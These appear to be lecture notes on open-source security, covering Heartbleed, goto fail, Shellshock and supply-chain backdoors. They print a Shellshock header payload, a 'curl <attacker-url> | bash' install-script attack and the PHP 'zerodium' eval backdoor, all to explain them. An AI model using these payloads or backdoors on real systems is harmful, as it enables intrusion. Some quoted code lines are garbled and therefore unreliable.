Open-Source Security

Is open source more secure because more people look at the code? Or less secure, because bad guys can look at the code and find bugs?

This question has been debated for quite some time. For a while, so-called "fuzzing" techniques (generating random or semi-random input) worked better when the source was available: the attacker would examine the source and generate inputs until all the edge cases were triggered. The goal was to execute every part of the code.

But then that changed: tools were developed that could do this given only the object code. At that point, having the source available was no longer a comparative liability, and a large number of Windows exploits started to appear.

On the other hand, the truth is that not everybody looks at the code. In most cases, not very many do.

TLS, for Transport Layer Security, is an encryption layer used above TCP (its datagram variant, DTLS, runs above UDP). It is what puts the 's' in https, for secure http.

Three issues

First, the software can have bugs. Perhaps this is more likely for Open Source because of fewer development resources, though that is hard to say.

Second, repositories can be compromised. This, too, can happen with commercial software, but Open Source does seem to be at least a little more prone to this.

Finally, it is easy for users to fall behind on upgrading. If you're installing an e-commerce package from Microsoft, then Microsoft will make sure it gets updated. However, if you're building your own e-commerce package from a dozen separate open-source projects, then it's your job to update them all. It's easy to forget.

These issues completely ignore the question of how many users actually look at the code in their open-source packages, or whether it's easier to figure out vulnerabilities once you hear vaguely of a problem with a certain project.

It remains true that Open Source projects are easier to trust. Even software from Microsoft is often tracking you or selling you something.

Debian OpenSSL bug

At some point (probably 2006), Debian removed a couple of lines from the Debian copy of OpenSSL because the lines generated complaints from code-analysis software. The code in question is in the function static void ssleay_rand_add(const void *buf, int num, double add). The call to MD_Update() there is actually a macro:

#define MD_Update(a,b,c)	EVP_DigestUpdate(a,b,c)

The variable m is a pointer to a certain structure. Here is part of the code:

	for (i=0; i<num; i+=MD_DIGEST_LENGTH)
		{
		/* ... computation of j (bytes this pass) and k elided ... */
		if (k > 0)
			{
			MD_Update(&m,&(state[st_idx]),j-k);
			MD_Update(&m,&(state[0]),k);
			}
		else
			MD_Update(&m,&(state[st_idx]),j);

		/* DO NOT REMOVE THE FOLLOWING CALL TO MD_Update()! */
		MD_Update(&m,buf,j);
		/* We know that line may cause programs such as
		   purify and valgrind to complain about use of
		   uninitialized data.  The problem is not, it's
		   with the caller.  Removing that line will make
		   sure you get really bad randomness and thereby
		   other problems such as very insecure keys. */
		MD_Update(&m,(unsigned char *)&(md_c[0]),sizeof(md_c));
		MD_Final(&m,local_md);
		md_c[1]++;

		buf=(const char *)buf + j;

		for (k=0; k<j; k++)
			{
			/* Parallel threads may interfere with this,
			 * but always each byte of the new state is
			 * the XOR of some previous value of its
			 * and local_md (itermediate values may be lost).
			 * Alway using locking could hurt performance more
			 * than necessary given that conflicts occur only
			 * when the total seeding is longer than the random
			 * state. */
			state[st_idx++]^=local_md[k];
			if (st_idx >= STATE_SIZE)
				st_idx=0;
			}
		}

The code-analysis software thought the repeated calls (this is inside a loop) to MD_Update(&m,buf,j) made use of uninitialized data. This may actually have been the case, in that perhaps some entropy was indeed supposed to come from the uninitialized data. The code does look odd, though, from a deterministic point of view. Still, the point of the repeated calls to MD_Update() was to generate additional randomness.

Commenting out the call to MD_Update(&m,buf,j) greatly reduced the total available entropy. Reportedly the only entropy remaining came from the process ID, a number of at most 16 bits. This completely breaks the random-number generator: every key it can produce comes from a space of at most 65,536 possibilities.
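A toy illustration (the generator below is our own invention, not OpenSSL's code) shows why a 16-bit seed space is fatal: an attacker who knows the algorithm can simply enumerate every possible seed.

```c
#include <stdint.h>

/* Toy stand-in for the broken generator: all "randomness" derives
   from a single 16-bit seed.  The mixing function is arbitrary; only
   the size of the seed space matters. */
static uint32_t toy_prng(uint16_t seed) {
    uint32_t x = seed + 1u;         /* avoid the all-zero state */
    x ^= x << 13;                   /* xorshift-style mixing */
    x ^= x >> 17;
    x ^= x << 5;
    return x;
}

/* An attacker recovers a working seed (and hence every derived key)
   by trying all 65536 possibilities. */
static int recover_seed(uint32_t observed_key) {
    for (uint32_t s = 0; s <= 0xFFFF; s++)
        if (toy_prng((uint16_t)s) == observed_key)
            return (int)s;
    return -1;                      /* key not from this generator */
}
```

This is essentially what happened with the Debian keys: the weak keys could all be generated in advance, and blacklists of them were published.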

Debian discovered and fixed the error in 2008.

Apple TLS bug

Here is the source code (Apple has open-sourced a lot of OS X, but not the GUI parts of it):

static OSStatus
SSLVerifySignedServerKeyExchange(SSLContext *ctx, bool isRsa, SSLBuffer signedParams,
                                 uint8_t *signature, UInt16 signatureLen)
{
	OSStatus        err;
	...

	if ((err = SSLHashSHA1.update(&hashCtx, &serverRandom)) != 0)
		goto fail;
	if ((err = SSLHashSHA1.update(&hashCtx, &signedParams)) != 0)
		goto fail;
		goto fail;
	if ((err =, &hashOut)) != 0)
		goto fail;
	...
	err = sslRawVerify(...);
	...

fail:
	SSLFreeBuffer(&signedHashes);
	SSLFreeBuffer(&hashCtx);
	return err;
}

Note the duplicated "goto fail", and the lack of enclosing {}. Despite what the indentation suggests, the second goto fail is always executed, so SSLVerifySignedServerKeyExchange() always jumps to fail, skipping the final hash check and the call to sslRawVerify() that performs the actual signature verification. At that point err is most likely still 0 (none of the preceding err != 0 checks succeeded), and so the connection is treated as verified even if there was a certificate mismatch.
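The control flow is easy to reproduce in miniature. This is our own condensed imitation, not Apple's code (every name here is invented), but the err handling and the duplicated goto have the same shape:

```c
#include <assert.h>

/* Each preliminary step "succeeds" by returning 0; verify_signature()
   is the step that should catch a bad certificate. */
static int step_ok(void)              { return 0; }
static int verify_signature(int good) { return good ? 0 : -1; }

static int check_server_key(int signature_good) {
    int err;
    if ((err = step_ok()) != 0)
        goto fail;
    if ((err = step_ok()) != 0)
        goto fail;
        goto fail;      /* the duplicated line: always taken */
    if ((err = verify_signature(signature_good)) != 0)  /* never reached */
        goto fail;
fail:
    return err;         /* err is still 0: "verified" */
}
```

Calling check_server_key(0), i.e. with a bad signature, still returns 0: the verification step was skipped and err was never set to an error.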

It's at times like this that it is really handy to have the compiler do dead-code and unreachable-code detection. Fail.

Ok, nobody was looking at the Apple source here outside of Apple.

OpenSSL "heartbleed" bug

As the Debian and Apple issues above show, anyone can introduce TLS bugs. But the "heartbleed" bug was clearly related to the relatively modest development resources available to the OpenSSL foundation.

Most servers used OpenSSL (which, despite its name, implements TLS). TLS contains a heartbeat provision: the client sends occasional "heartbeat request" packets and the server is supposed to echo them back, exactly as is. This keeps the connection from timing out. That is, the client sends a (len,data) pair, and the server is supposed to echo back that much data. Part of the reason for echoing back data is so the client can figure out which request triggered a given response. It might make the most sense for the client request data to represent consecutive integers: "0", "1", ..., "10", "11", "12", ....

The problem is that the client can lie: the client can send a request in which len ≠ data.length. If len < data.length, this is harmless; just the first len bytes of data get sent back. But what happens if len > data.length, and the server sends back len bytes? In this case the server would try to send too much back. In a sensible language, this would result in an array-bounds exception for data. In C, however, the result is the grabbing of a random chunk of memory beyond data. Suppose a sneaky client sent, say, a 3-byte payload, but declared the payload length (the value of len) as, say, 1000 bytes. The server now sends back 997 bytes of general heap memory, which may contain interesting content. Unpredictable, but interesting.
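A small simulation (entirely our own; no OpenSSL code) makes the over-read concrete. Here the "server memory" is a struct in which secret data happens to sit immediately after the stored payload, standing in for adjacent heap memory:

```c
#include <string.h>

/* Simulated server memory: the stored heartbeat payload, with
   unrelated secret data sitting immediately after it. */
struct server_mem {
    char payload[4];        /* client actually sent 3 bytes: "hi" + NUL */
    char secret[16];        /* e.g. a private-key fragment */
};

/* The buggy behavior: trust the client-declared length and copy that
   many bytes starting at the payload, with no check against the
   payload's actual size. */
static void heartbeat_reply(const struct server_mem *m, char *out, size_t declared_len) {
    memcpy(out, m->payload, declared_len);   /* over-reads when declared_len > 4 */
}

/* Returns 1 if lying about the length leaked the adjacent secret. */
static int demo_leak(void) {
    struct server_mem m = { "hi", "SECRET_KEY_BITS" };
    char out[sizeof m];
    heartbeat_reply(&m, out, sizeof m);      /* client claims 20 bytes, not 3 */
    return memcmp(out + sizeof m.payload, m.secret, sizeof m.secret) == 0;
}
```

In the real attack the memory beyond the payload was whatever happened to be on the heap, which from time to time included private keys, session cookies, and passwords.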

[xkcd diagram of the heartbleed exploit]

Here is the original code, from tls1_process_heartbeat(SSL * s). The variable payload represents the length of the heartbeat payload.

n2s(p, payload);	// extract value of payload (the length)
pl = p;
if (hbtype == TLS1_HB_REQUEST)
	{
	unsigned char *buffer, *bp;
	int r;

	/* Allocate memory for the response, size is 1 bytes
	 * message type, plus 2 bytes payload length, plus
	 * payload, plus padding */
	buffer = OPENSSL_malloc(1 + 2 + payload + padding);
	bp = buffer;

	/* Enter response type, length and copy payload */
	*bp++ = TLS1_HB_RESPONSE;
	s2n(payload, bp);
	memcpy(bp, pl, payload);	// pld: copy payload bytes from pointer pl to pointer bp (=buffer, above)
	bp += payload;
	/* Random padding */
	RAND_pseudo_bytes(bp, padding);

	r = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buffer, 3 + payload + padding);

	if (r >= 0 && s->msg_callback)	// pld: this will get moved
		s->msg_callback(1, s->version, TLS1_RT_HEARTBEAT,
			buffer, 3 + payload + padding,
			s, s->msg_callback_arg);

	OPENSSL_free(buffer);
	if (r < 0)
		return r;
	}

There is no check here that the value of payload, the declared length of the payload, matches the actual length of the payload.

Here is the fix:

	/* Read type and payload length first */
	if (1 + 2 + 16 > s->s3->rrec.length)
		return 0;	// no payload at all: silently discard
	hbtype = *p++;
	n2s(p, payload);
	if (1 + 2 + payload + 16 > s->s3->rrec.length)
		return 0;	// declared length exceeds actual length;
				// RFC 6520 section 4 says to silently discard
	pl = p;

	if (s->msg_callback)	// this got moved up, so it always executes,
				// even when one of the later returns is taken
		s->msg_callback(0, s->version, TLS1_RT_HEARTBEAT,
			&s->s3->[0], s->s3->rrec.length,
			s, s->msg_callback_arg);

	if (hbtype == TLS1_HB_REQUEST)
		{
		unsigned char *buffer, *bp;
		int r;

		/* Allocate memory for the response, size is 1 bytes
		 * message type, plus 2 bytes payload length, plus
		 * payload, plus padding */
		buffer = OPENSSL_malloc(1 + 2 + payload + padding);
		bp = buffer;

		/* Enter response type, length and copy payload */
		*bp++ = TLS1_HB_RESPONSE;
		s2n(payload, bp);
		memcpy(bp, pl, payload);	// copy payload bytes from pointer pl to pointer bp (=buffer, above)
		bp += payload;
		/* Random padding */
		RAND_pseudo_bytes(bp, padding);

		r = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buffer, 3 + payload + padding);
		OPENSSL_free(buffer);
		if (r < 0)
			return r;
		}

The crucial change is that both length checks now happen before the memcpy(), so a declared length longer than the actual payload causes the request to be silently discarded.

Google reported the bug to the OpenSSL Foundation on April 1, 2014. It is estimated that somewhere between 15 and 60% of sites using SSL were affected.

The bug is now fixed. Nobody knows how much it was exploited.

The more interesting question might be why OpenSSL didn't get more attention before. There were people outside the OpenSSL Foundation looking at the code, but none of them noticed Heartbleed.

Ultimately, the problem was that OpenSSL was severely underfunded. The president of the OpenSSL foundation is (or was, in 2014; he's since left) Steve Marquess. In a blog post after Heartbleed, he described himself as the fundraiser. The OpenSSL foundation received $2,000/year in donations, and also did some support consulting (the latter earned a lot more).

In the week after Heartbleed, the OpenSSL foundation received $9,000, mostly in small donations from individuals. Not from the big corporate users of OpenSSL.

The foundation has one paid employee, Stephen Henson, who has a PhD in graph theory. He is not paid a lot. Before Steve Marquess created the OpenSSL foundation, Steve Henson's income had been estimated at $20K/year. (The heartbleed error was not his.)

Despite the low level of funding, though, in the eight (or more) years before Heartbleed the OpenSSL Foundation was actively seeking certification under the NIST Cryptographic Module Validation Program. They understood completely that cryptography needs outsider audits.

As of 2014, at least, the two Steves had never met face-to-face. Like Steve M, Steve Henson moved on to other projects in 2017.

A month after the bug's announcement, the Linux Foundation announced that it was setting up the Core Infrastructure Initiative. They lined up backing from Google, IBM, Facebook, Intel, Amazon and Microsoft. The first project on the agenda was OpenSSL, and its struggle to gain certification from the US government.

In 2015 a formal audit of OpenSSL was funded by the Open Crypto Audit Project. That audit has since been completed; a status report was published in 2016.

A later report, from Black Duck in 2016, found that 10% of the applications they tested were still vulnerable to Heartbleed, a year and a half after the revelation.

See also the Buzzfeed article "The internet is being protected by two guys named Steve".

More Open-Source Security Issues

Magento

Magento is an e-commerce platform owned by Adobe. It is described as having an "open-source ecosystem". It is available on GitHub; presumably the GitHub version is the "community edition". There is also an "enterprise edition".

A vulnerability was announced in April 2017 by DefenseCode LLC, six months after it was reported privately to Magento; Magento never responded directly to DefenseCode. The vulnerability "could" lead to remote code execution, though some additional steps are needed to get that to work, and it was not clear whether that actually happened in the wild.

If a site adds a link to a product video stored remotely on Vimeo, the software automatically requests a preview image. If the file requested is not in fact an image file, Magento will log a warning message, but it will still download the file. The idea is thus to trick Magento into downloading an executable file, eg a .php file. An updated .htaccess file must also be downloaded, but once the basic file-download trick is working this is not difficult. Because Magento stores downloaded files in directories determined by the initial characters of the filename, the .php file's name should begin with ".h", so that it ends up in the same directory as the .htaccess file.

Parts of the strategy also involve cross-site request forgeries (CSRF) against someone with Magento management privileges at the target site. Even low-level privileges are sufficient. There are numerous strategies for trying to get someone to click on a suitable link; none of them are sure bets.

Magento's failure to respond more aggressively to DefenseCode was puzzling. This seems less likely in a "true" open-source project.

As of 2018, Magento was still running into security issues, often related to brute-force attacks on administrative passwords, which were often not well-configured. Magento is an attractive target, as it is an e-commerce front-end, and as a result a large number of credit-card transactions flow through it.

Around the same time, open-source security firm Black Duck was sold, to Synopsys, for roughly half a billion dollars.

Equifax

In August 2017 the credit-reporting company Equifax discovered that personal records on over 140 million US consumers had been exfiltrated. The actual vulnerability was in Apache Struts 2, a framework for developing Java server-side web applications; it extends the Java Servlet API. Struts has a history of serious vulnerabilities. The vulnerability in question was CVE-2017-5638, which allows remote code execution.

Equifax was notified of the issue in March 2017. They looked, but could not find a place on their site where Struts was being used! The vulnerability went unpatched, even as it was being routinely exploited in the wild.

Making sure tools and frameworks are updated is tedious work. Something like Struts can be buried in the archives of a project that was largely completed years ago. Still, Equifax's negligence is hard to understand.

Shellshock

This is the bug in bash that allowed very easy remote code execution. It was discovered, and fixed, in 2014. The problem was that the act of setting an environment variable -- normally benign -- could be tricked into executing a shell command as well, if the environment variable began with a shell function definition.

The shell maintains the environment as a list of (name,value) pairs. Specifically, we can assign an environment variable as follows:

FOO=hello
echo $FOO		# prints hello

We can also assign shell functions, eg with

FN() { echo hello;}

(the space before "echo" is significant). Prior to Shellshock, this would be stored in the environment as the pair (FN, "() { echo hello;}"). (You can list bash functions with typeset -F.)

The problem was that one could sneak in a command following the function definition, and it would be executed at the time the environment variable was set:

FN() { echo hello;}; echo "hello world!"

(The command is not actually part of the function.) This is due to a mistake in recognizing the end of the function body. The above looks to older versions of bash like the following environment-variable assignment, followed by a command.

FN='{ echo hello;}; echo "hello world!"'

Whenever this definition is executed (eg at the time it is made, and whenever the environment is passed to a new process), the 'echo "hello world!"' command would go along for the ride. The core problem here is with shell variables that begin with '()'; normal shell-variable strings do not result in this problem. That is, assigning a variable FN2='echo "hello world"' would not result in command execution; nor would FN3="foo"; echo "hello world" (though when done for the first time the FN3 example would echo "hello world" once).

This is most of the problem. The other part is that web servers, and quite a range of other software, routinely accept strings from clients that they then turn into environment variables. For example, suppose the client sends the following GET request to the server:

GET / HTTP/1.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,fr;q=0.6
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

then the server turns it into the following environment settings (before executing the GET request):

HTTP_USER_AGENT=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

The server does this so that a cgi script on the server will have access to these values, through its environment. However, because of the bug, setting environment variables can lead to code execution!

Now, if the client instead sent the following text as the User-Agent (the value here is not an actual browser-identification string at all):

User-Agent: () { :; }; /bin/eject

Then the command /bin/eject would be executed on the server. (As for the shell-function part, ":" is the bash null command; the legal function portion is () { :; };.)

A consequence of the patch is that bash functions are no longer stored in the environment at all. (This wouldn't strictly have been necessary, but it probably was a good idea.)

Meltdown and Spectre

The Meltdown and Spectre vulnerabilities primarily affect Intel CPUs (variants of Spectre affect other vendors' processors as well); Intel open-sources nothing about its processors. But open-source operating systems still had to create patches.

The problem is that open-source patches had to be created while there was still a news embargo on the details of the vulnerabilities, lest miscreants get a leg up on exploiting them.

Meltdown and Spectre were discovered in the summer of 2017 by Jann Horn of Google's Project Zero, Werner Haas and Thomas Prescher from Cyberus Technology, and Daniel Gruss, Moritz Lipp, Stefan Mangard and Michael Schwarz from Graz University of Technology. The discoverers informed Intel, and all agreed to announce the flaw only once there was a fix in place.

In November 2017, Alex Ionescu noticed an upgrade to Windows 10 that made the CPU run slower, with no obvious benefit. He suspected this was a vulnerability patch.

On Wednesday January 3, 2018, there were new commits to the Linux kernel. Observers quickly noticed that the commits didn't seem to make sense from a performance perspective. Rampant speculation that they were related to a hardware vulnerability led to the announcement of Spectre and Meltdown that same day. The scheduled release/announcement date had been January 9, Microsoft's "Patch Tuesday".

Still, the Linux community by and large did abide by the embargo rules. This is complicated, because it means not using the public discussion system that has been put in place. It also means not releasing important security fixes until the embargo is ended.

The head of OpenBSD, Theo de Raadt, was extremely vexed, as OpenBSD was not given advance warning:

Only Tier-1 companies received advance information, and that is not responsible disclosure – it is selective disclosure.... Everyone below Tier-1 has just gotten screwed.

De Raadt also argued that, while Spectre might be considered an unforeseen bug, the issues behind Meltdown were long understood to at least some degree. Intel decided to go ahead with their speculative-execution design anyway, in order to beat the competition.

OpenBSD did announce a fix before the end of the embargo for the Wi-Fi KRACK vulnerability of October 2017. The theory at that time was that OpenBSD would therefore not be given advance warning of the next vulnerability. But several other smaller OS vendors (Joyent, SmartOS) also were not told about Meltdown/Spectre in advance.

Still, there is a real problem: to abide by embargo rules means sitting on a fix, knowing your users might be being attacked. It means your source is, until the embargo ends, no longer "open".

Windows Security

Windows systems are quite hard to secure, partly because there are so many files that are not well-understood within the security community, and partly because of the registry.

Licensing rules don't help. If you want to verify the SHA-3 checksum of every file, for example, you pretty much have to boot from a separate, known-clean boot device; otherwise, malware that has made it into the kernel can make it seem that all files are unchanged. However, in Windows, a separate boot device technically requires a separate license, and in practice making a bootable Windows USB drive is not easy without paying for one.

Cryptography Software

It is certainly reasonable to think of commercial software as reliable. After all, one can read the reviews, and a company couldn't stay in business if it didn't keep its users happy. If the software doesn't work properly, won't users know?

If the software is a word processor, and it keeps crashing, or failing to format text properly, the failure is obvious. If the software does complex engineering calculations, that's harder to detect, but usually users do at least a little testing of their own.

But if closed-source software does encryption, it is almost impossible to verify that it was done correctly. Just what random-number algorithm was used? Was the AES encryption done properly? (If it was not, the problem becomes very clear when the software sends encrypted content to an independent decryption program; but often the same program is used both to encrypt files and later to decrypt them, in which case a flawed algorithm is almost undetectable.) Was the encryption done first, followed by the authentication hash (HMAC), or the other way around? Encrypting first is much safer: the HMAC is then computed over the ciphertext, and so provides no information about whether brute-force decryption is on the right track.
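The ordering point can be illustrated with deliberately toy primitives (a one-byte XOR "cipher" and a trivial checksum "MAC" of our own; nothing here is real cryptography): with MAC-then-encrypt, the tag gives a brute-forcing attacker a way to test candidate keys, while with encrypt-then-MAC it does not.

```c
#include <stdint.h>
#include <stddef.h>

/* Toy primitives for illustration only; real systems use AES and HMAC. */
static void toy_xor(uint8_t key, const uint8_t *in, uint8_t *out, size_t n) {
    for (size_t i = 0; i < n; i++)
        out[i] = in[i] ^ key;       /* same operation encrypts and decrypts */
}

static uint8_t toy_mac(const uint8_t *in, size_t n) {
    uint8_t m = 0;
    for (size_t i = 0; i < n; i++)
        m = (uint8_t)(m * 31 + in[i]);
    return m;
}

/* MAC-then-encrypt: the tag was computed over the *plaintext*.  An
   attacker decrypts under a candidate key and checks the inner MAC;
   a match is a signal that the guess is right. */
static int mte_candidate_confirmed(uint8_t candidate, const uint8_t *ct, size_t n, uint8_t tag) {
    uint8_t pt[64];
    if (n > sizeof pt) return 0;
    toy_xor(candidate, ct, pt, n);  /* trial decryption */
    return toy_mac(pt, n) == tag;
}

/* Encrypt-then-MAC: the tag covers only the *ciphertext*, so the
   check reads the same no matter what key is guessed -- no signal. */
static int etm_candidate_confirmed(uint8_t candidate, const uint8_t *ct, size_t n, uint8_t tag) {
    (void)candidate;                /* the guess plays no role */
    return toy_mac(ct, n) == tag;
}
```

With the toy cipher a wrong guess in the MAC-then-encrypt case usually fails the inner check, while the encrypt-then-MAC tag "confirms" every guess equally, which is exactly why it leaks nothing.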

For reasons like this, some commercial encryption software is audited. But usually it is not. The bottom line is that commercial crypto is hard to trust.

Sometimes open-source isn't audited either. But it's hard to find out. And even with OpenSSL, people outside the OpenSSL foundation were looking at the basics of encryption, to make sure it looked ok.

Software Trust

Whatever one can say about open-source reliability (which, in general, is comparable to commercial-software reliability), open source wins the trust issue hands down. Once upon a time, most software was trustworthy, in that you could be reasonably sure the software was not spying on you. Those days are gone. Most Android apps spy, to some degree or another, on the user. Microsoft Office appears not to, but Windows 10 sends quite a bit of information back to Microsoft (some of this can be disabled through careful configuration).

Spyware is almost unknown, however, in the open-source world. Ubuntu has a search feature that returns some information to Canonical, but that's reasonably up-front. Firefox often asks to send crash reports, but, again, that's open. The reason open-source spyware is so rare is straightforward: with the source public, covert data collection is easy to spot, and a project that tried it would promptly be called out, or forked.

Ironically, "free" software that is not open-source is usually spyware: "if you're not paying for the product, you are the product". Most non-open-source browser add-ons, in particular, are spyware. Many Android apps are spyware; flashlight apps are notorious.

Open-source trust is not always quite straightforward. Firefox, for example, is the browser with the most privacy-protection features, hands down. A version of Firefox is the basis for the Tor browser. That said, many Firefox privacy features are disabled by default, because some commercial sources of Firefox funding have had concerns.

SourceForge (and Gimp)

SourceForge is a popular alternative to GitHub for open-source projects. GitHub makes money selling space for non-public projects (public projects are free). SourceForge sold banner advertisements, and in 2013 started a "bundleware" program in which a user who downloaded a program or source tree would optionally receive a second download. The second download was selected by default, though users could unselect it. SourceForge is often used to distribute binaries, so this bundleware issue was not easily avoided once the download started.

The problem was that the second download, a paid placement, often involved malware. At a minimum, spyware was common. Another unwelcome feature was advertisements that were allowed to contain a large DOWNLOAD button.

The Gimp project left SourceForge in 2013, but as of 2015 SourceForge was still distributing Gimp binaries (as an "abandoned" project), and bundling them with malware. This did not go over well with the Gimp team.

How can an open-source project protect itself against malicious distribution? What happens when a project is completely abandoned? What happens when a project simply moves elsewhere?

In 2016 the bundleware program was ended, as new owners took control.

Generally speaking, the actual open-source repositories were not tampered with, though the Gimp case might be an exception.

Tampered or Trojaned Repositories

These are also sometimes called software "supply chain" attacks.

In 2003, the main Linux repository was still on BitKeeper, but the project maintained a separate mirror repository running CVS. One day a patch appeared in the CVS image, in the code for the wait4() system call:

+       if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+                       retval = -EINVAL;

That last '=' on the first line is an assignment, not a comparison. Setting uid to 0 gives the process root privileges. Inside a syscall, that is legal.
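A condensed imitation (ours, not the actual kernel code) shows the effect; the option names are stand-ins for __WCLONE and __WALL, and -22 stands in for -EINVAL:

```c
#define OPT_CLONE 0x80      /* stand-in for __WCLONE */
#define OPT_ALL   0x40      /* stand-in for __WALL */

struct task { int uid; };   /* uid 0 means root */

static int backdoored_wait4(struct task *current, int options) {
    int retval = 0;
    /* The second '=' is an assignment, not '==': it sets uid to 0
       (root) and evaluates to 0, so the branch body never runs and
       no error is ever reported. */
    if ((options == (OPT_CLONE|OPT_ALL)) && (current->uid = 0))
        retval = -22;       /* looks like ordinary -EINVAL option checking */
    return retval;
}
```

Calling it with the magic option combination silently makes the caller root, while every other call behaves normally -- which is what made the patch so easy to mistake for routine error checking.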

This patch never made it back to the main BitKeeper repository, and it was suspicious from the beginning: it was the only file on the CVS mirror without a link back to BitKeeper. But nobody knows how it got there.

There was a break-in at in 2011. It is not certain that no kernel files were briefly modified, though the rigorous checksumming process would have made that difficult. Donald Austin was arrested for the breach, in Florida, in 2016.

In 2012, a SourceForge mirror site was hacked, and the phpMyAdmin package was modified to contain malware.

In June 2018, hackers took over a Gentoo mirror account on GitHub and installed file-deleting malware. Gentoo had suffered at least one earlier such attack, in 2010.

In July 2018, three packages on the Arch User Repository were infected with malware, including acroread (Adobe Acrobat Reader). Acroread isn't open-source, but it's trivial to install a one-line attack in the installation script:   

   curl -s <attacker-url> | bash &

The AUR is not the same as the Arch distribution itself, but distinctions like this are sometimes hard to keep track of.

In an Aug 7, 2018 blog post, Eric Holmes described how he gained commit access to Homebrew using credentials he found exposed online. Homebrew is a package manager for Macs, though it also works well under Linux.

Webmin

There was also a 2018 attack on Webmin, a system-administration tool, in which password_change.cgi was modified. The attack affected the code on the build server, but apparently not the GitHub repository. Still, the vulnerable code was widely distributed: most users installed the Debian or RPM pre-compiled package.

Ruby strong_password gem

In June 2019, version 0.0.7 of the Ruby strong_password gem ("gem" is Ruby's name for a library) was hijacked.


Here's the crucial code: {
    loop {
        sleep rand * 3333
        # ... fetch and eval of the remote payload elided ...
    }
} if Rails.env[0] == "p"	# ie only when Rails is running in "production"


This had also happened in March 2019 with a different Ruby package.

In both cases, the source was unchanged; the distribution at, the central Ruby gem repository, was what was compromised.

There were multiple related vulnerabilities discovered in August 2019 as well.

There's also the VestaCP admin interface, and a python package Colourama.

Consider building from source for production versions!

decompress

A vulnerability in the open-source file-compression utility decompress was discovered in 2020. The problem is that, while decompressing, it could overwrite files such as ../../../etc/passwd (or, for that matter, ./foo/bar/../../../../../etc/passwd). This is a very old idea, but it keeps coming up. It is surprisingly hard to validate legitimate relative paths.
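One defensive sketch (ours; real extractors must also worry about symlinks, Windows path syntax, and more) is to walk the path components and track depth, rejecting any path that climbs above the extraction root:

```c
#include <string.h>

/* Returns 1 if `path` is a relative path that stays within the
   extraction root, 0 otherwise.  A sketch only: symlinks, drive
   letters, and backslash separators are not considered. */
static int path_is_safe(const char *path) {
    char buf[1024];
    int depth = 0;

    if (path[0] == '/')                 /* absolute path: reject */
        return 0;
    if (strlen(path) >= sizeof buf)     /* too long to vet: reject */
        return 0;
    strcpy(buf, path);                  /* strtok modifies its argument */

    for (char *tok = strtok(buf, "/"); tok; tok = strtok(NULL, "/")) {
        if (strcmp(tok, "..") == 0) {
            if (--depth < 0)            /* climbed above the root */
                return 0;
        } else if (strcmp(tok, ".") != 0) {
            depth++;                    /* ordinary component */
        }
    }
    return 1;
}
```

Note that counting depth is what catches the sneakier form: foo/bar/../../../../etc/passwd contains ".." components that are individually legal-looking but in total climb out of the root.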

PyYAML

YAML is a data-serialization format, not unlike JSON. PyYAML unpacks YAML data. Alas, it could be tricked, in a bug discovered in 2020, into running arbitrary constructors (and thus arbitrary code) when deserializing data. (The pickle library, the standard Python serialization mechanism, had the same issue a few years earlier.)

lodash

This is a JavaScript library that supports a range of common utility functions. It is used in some 4 million projects on GitHub alone. A vulnerability discovered in 2019 involved "prototype pollution", eg modification of Object-level standard methods through the introduction of new child classes.

Octopus scanner

The Octopus scanner was malware on GitHub that tried to infect other repositories, through the use of a Netbeans issue. It was discovered in spring 2020. Once a Netbeans installation was infected, every .jar file built with that installation would also carry the infection.

PHP backdoor

In March 2021 it was discovered that an update to PHP contained a backdoor. If a website used the compromised PHP, someone could execute arbitrary code through the use of the password "zerodium". The PHP code was hosted on a private git server,, and it looks like the server itself was compromised: the malicious code appeared to have been uploaded by two trusted PHP maintainers (who were not in fact involved).

There is in fact a security company named Zerodium, but they were not related.

The added code looked something like this:

if (strstr(Z_STRVAL_P(enc), "zerodium")) {
    zend_try {
        zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017");
    } zend_end_try();
}

The idea was that if your User-Agent HTTP header string began with "zerodium", then the rest of the string would be executed. That "REMOVETHIS" string is just what gets inserted in the logfiles.

Thompson Backdoor

Ken Thompson is one of the original developers of Unix. In his 1983 Turing Award speech, "Reflections on Trusting Trust", he described the following hack: the C compiler would be modified so that, whenever it compiled the login program, it inserted a backdoor accepting a secret master password; and whenever it compiled the compiler itself, it re-inserted both Trojans, so the backdoor survived even recompiling the compiler from clean source.

There was one more step: when the compiler was asked to disassemble the Trojaned code, it would show what the code was supposed to be, not what it actually was.

Thompson did implement this as a demo. Nobody really thinks anyone is trying this today.